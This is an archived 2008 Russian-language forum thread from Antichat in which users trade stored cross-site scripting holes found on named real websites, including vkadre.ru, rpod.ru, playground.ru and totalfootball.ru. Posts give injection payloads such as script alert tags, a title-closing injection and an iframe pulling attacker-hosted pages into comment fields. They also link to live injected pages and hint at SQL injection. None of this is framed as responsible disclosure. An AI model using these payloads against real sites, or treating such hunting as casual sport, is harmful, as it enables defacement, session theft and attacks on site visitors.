ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.06.2008, 18:10
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
|
|
|

10.06.2008, 23:11
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме: 305110
Репутация:
133
|
|
Сообщение от xcedz
=\ за разделом никто не следит так как они на фик никому не нужны  к статит это пассивные.
Еманыйрот!
А зря может кто нить научился бы xss различать
vkadre.ru
собственно тыкая создать добавить ролик вбиваем имя
Код:
</title><script>alert(/xss/)</script>
+
cобственно канает любой тег главное title закрыть
вотс уже рабочий линк
http://vkadre.ru/users/1926899
Кто хорошо подумает может на самом контакте активку найти 
Последний раз редактировалось MaSTeR GэN; 10.06.2008 в 23:26..
|
|
|

11.06.2008, 22:02
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
И снова я
http://www.internetpro.ru/boards/index.php
добавим пару объяв о продаже мопедов? )))))))))
|
|
|

11.06.2008, 22:21
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
http://majordomo.ru/constructor/
Заходим на тестовый акк, удаляется через 20 минут )))
http://iloveru.net/ трут быстро =)
Последний раз редактировалось xcedz; 11.06.2008 в 22:31..
|
|
|

11.06.2008, 22:48
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме: 305110
Репутация:
133
|
|
вообшем то сайт ру подкастинга
rpod.ru
собсвенно уязвимо поле коменнентов т,е заходим выбириаем группу тему и оставляем коммент
Код:
<iframe src="http://blabla.ru/index.html" <
ну и собственно создаем на домене blabla.ru index.html
c нужным кодом )
рабочий пример с фреймом на гугль.ru )
http://siski-piski-show.rpod.ru/82.html#c110876
|
|
|

12.06.2008, 15:04
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
price.ua
завдоми ак,
поле фио.
усё. =)
|
|
|

13.06.2008, 03:53
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме: 2252257
Репутация:
627
|
|
Тока что нашел одну ХСС у себя на форуме на mybb.ru, наверно баян, но все же.
В профиле есть вкладка "остальное", в админке можно разрешить пользователям заполнять ее.
Пишем <script>alert()</script> и вуаля. А дальше ищите дурака админа, который разрешил эти поля.
Проблема в длинне. Максимум на серве 999 символов, а там, кто как поставит.
Последний раз редактировалось Лайт; 13.06.2008 в 04:16..
|
|
|

14.06.2008, 02:02
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
ловите позитффф
http://blog.meta.ua блоги
как вариант, создаем свое сообщество
http://contact.meta.ua
вообщем есть над чем поразмыслить =\
Последний раз редактировалось xcedz; 14.06.2008 в 06:46..
|
|
|

15.06.2008, 00:08
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме: 2252257
Репутация:
627
|
|
Нашел уязвимость на www.playground.ru
Жмем регистрация и вставляем <script>alert()</script>
Уязвимые поля:
Конфигурация компьютера
Ваш сайт
О себе
Вот моя рега http://users.playground.ru/448520/
Последний раз редактировалось Лайт; 15.06.2008 в 00:11..
|
|
|

15.06.2008, 07:46
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Журнал Total Football
http://www.totalfootball.ru
Добавляем комментарий к новости, уязвимы все поля
Также присутствует пассивка в поиске, и если поискать sql-inj 
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Xss
|
bx_N |
Forum for discussion of ANTICHAT |
7 |
11.03.2007 19:17 |
|
mylivepage.ru активные XSS
|
__XT__ |
Уязвимости |
3 |
23.12.2006 14:31 |
|
Xss для новичков
|
Micr0b |
Уязвимости |
0 |
04.06.2006 18:25 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|